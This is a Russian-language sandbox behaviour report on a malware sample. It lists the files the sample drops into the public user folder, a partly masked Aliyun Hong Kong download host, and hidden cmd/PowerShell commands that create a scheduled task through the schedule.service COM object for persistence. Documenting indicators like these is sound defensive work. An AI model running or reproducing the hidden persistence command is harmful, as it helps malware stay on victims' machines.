Техническая информация
Изменения в файловой системе
Создает следующие файлы
- nul
- C:\users\public\servicehub.zip
- C:\users\public\silverlight.exe
Сетевая активность
TCP
Другие
- 'fl############erver.oss-cn-hongkong.aliyuncs.com':443
UDP
- DNS ASK ba##u.com
- DNS ASK fl############erver.oss-cn-hongkong.aliyuncs.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\ping.exe' baidu.com' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c "powershell.exe -Command $taskObject = New-Object -ComObject schedule.service; $taskObject.Connect(); $rootFolder = $taskObject.GetFolder(''); $taskdefinition = $taskObject.NewTask($null)...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\ping.exe' baidu.com
- '<SYSTEM32>\cmd.exe' /c "powershell.exe -Command $taskObject = New-Object -ComObject schedule.service; $taskObject.Connect(); $rootFolder = $taskObject.GetFolder(''); $taskdefinition = $taskObject.NewTask($null)...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command $taskObject = New-Object -ComObject schedule.service; $taskObject.Connect(); $rootFolder = $taskObject.GetFolder(''); $taskdefinition = $taskObject.NewTask($null); $regInfo = $tas...
